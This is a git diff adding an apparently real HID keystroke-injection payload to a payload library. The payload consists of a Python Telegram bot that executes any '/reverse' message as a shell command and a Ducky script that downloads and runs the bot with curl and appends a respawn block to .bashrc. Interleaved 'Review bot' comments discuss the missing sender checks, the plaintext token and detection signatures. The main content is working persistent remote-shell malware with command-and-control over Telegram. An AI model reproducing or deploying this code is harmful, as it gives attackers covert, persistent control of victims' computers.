diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md new file mode 100644 index 000000000..8bd1028de --- /dev/null +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md @@ -0,0 +1,41 @@ +# Persistent Reverse Shell - Telegram Based + +A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot. + +**Category**: Execution + +## Dependencies + +* Internet Connection + +## Description + +A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot. + +This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection. + +The script accept the `/reverse` command using the format `/reverse ` and split `/reverse` from `` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`. + +Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
new file mode 100644
index 000000000..bcb367760
--- /dev/null
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
@@ -0,0 +1,43 @@
+from telebot import TeleBot, types
+import subprocess
+
+# Set here the Telegram bot token
+BOT_TOKEN = ""
+bot = TeleBot(BOT_TOKEN)
+
+commands = [
+ types.BotCommand("/reverse", "/reverse ")
+]
+
+bot.set_my_commands(commands=commands)
+
+@bot.message_handler(commands=['reverse'])
+def reverse_shell(message):
+ command = extract_command(message.text)
+ if command != "":
+ print(f"Command received: {command}")
+ out = run_command(command)
+ if len(out) > 1000:
+ bot.reply_to(message, "Message too long...")
+ chunk_size = 1000
+ for i in range(0, len(out), chunk_size):
+ bot.send_message(message.chat.id, out[i:i+chunk_size])
+ else:
+ bot.reply_to(message, out)
+
+def extract_command(message):
+ command_prefix = "/reverse"
+ if message.startswith(command_prefix):
+ return message[len(command_prefix):].strip()
+ else:
+ return None
+
+def run_command(command):
+ try:
+ result = subprocess.check_output(command, shell=True, text=True)
+ return result.strip()
+ except subprocess.CalledProcessError as e:
+ return f"Some error: {e}"
+
+
+bot.infinity_polling()
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
new file mode 100644
index 000000000..3ffd8fcc7
--- /dev/null
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
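Review bot: `run_command` hands the message text straight to `subprocess.check_output(command, shell=True)`, and nothing between the `@bot.message_handler(commands=['reverse'])` entry point and that call checks who sent the message or which chat it came from, so whoever can reach the bot gets the same shell on the host. `BOT_TOKEN` is the only secret involved and it sits in plaintext in the very file the companion payload drops on the target, so a responder who recovers `connection.py` holds a live credential that both identifies the bot and should be revoked. On Linux the `shell=True` call runs each command as a child `/bin/sh -c` process of `python3 connection.py`, while `bot.infinity_polling()` keeps a long-lived outbound HTTPS poll to the Telegram Bot API open (presumably; the polling transport is inside `telebot`), and that parent/child pairing plus the persistent outbound connection is the behavioural signature to alert on. None of this is mentioned in the module, which has no header comment at all; at minimum `# Executes any /reverse text it receives as a shell command; the token below is the sole credential.` above `BOT_TOKEN` would make the trust boundary explicit.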
@@ -0,0 +1,32 @@
+* REM ############################################################
+* REM # #
+* REM # Title : Persistent Reverse Shell - Telegram Based #
+* REM # Author : Aleff #
+* REM # Version : 1.0 #
+* REM # Category : Execution #
+* REM # Target : Linux #
+* REM # #
+* REM ############################################################
+
+ATTACKMODE HID
+
+* REM Requirements:
+* REM - Internet Connection
+
+QUACK REM VARIABLES
+* REM 1) Here you must put your own file link.
+PYTHON-SCRIPT-LINK='https://www.example.com/connection.py'
+
+QUACK DELAY 1000
+QUACK CTRL-ALT t
+QUACK DELAY 2000
+
+QUACK STRING curl -o connection.py $PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then
+QUACK ENTER
+
+QUACK STRING python3 connection.py &
+QUACK ENTER
+
+QUACK STRING fi\" >> .bashrc; exit
+QUACK ENTER
+
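Review bot: The `* REM Requirements:` block lists only an Internet connection, but the typed command line depends on `curl`, `python3` with the third-party `telebot` package importable, and `pgrep` all being present on the target, and the README repeats the same one-item list; the header should name them, e.g. `* REM - curl, python3 (with telebot importable) and pgrep on the target`. For anyone assessing exposure to this payload, the durable artifacts it leaves are plaintext and user-level: a `connection.py` written by `curl -o` into whatever directory the terminal opened in, and an `if ! pgrep -f connection.py ... fi` block appended to `.bashrc`, both of which a shell-startup-file audit or file-integrity monitoring of dotfiles surfaces. `QUACK CTRL-ALT t` also assumes a desktop whose terminal shortcut is Ctrl+Alt+T (a GNOME/Ubuntu convention, as far as I can tell), which the bare `Target : Linux` line does not convey and deserves a hedged note in the header.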